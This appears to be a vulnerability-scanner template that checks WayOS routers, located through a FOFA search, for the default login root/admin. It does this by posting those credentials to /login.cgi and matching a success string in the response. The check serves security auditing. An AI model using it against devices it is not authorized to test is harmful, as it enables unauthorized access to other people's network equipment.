漏洞描述
fofa "wayos"
id: wayos-default-password
info:
name: wayos-default-password
author: zan8in
severity: high
verified: true
description: fofa "wayos"
rules:
r0:
request:
method: POST
path: /login.cgi
body: |
user=root&password=admin&Submit=%E7%99%BB+%E9%99%86
expression: response.status == 200 && response.body.bcontains(b"window.open('index.htm?_")
expression: r0()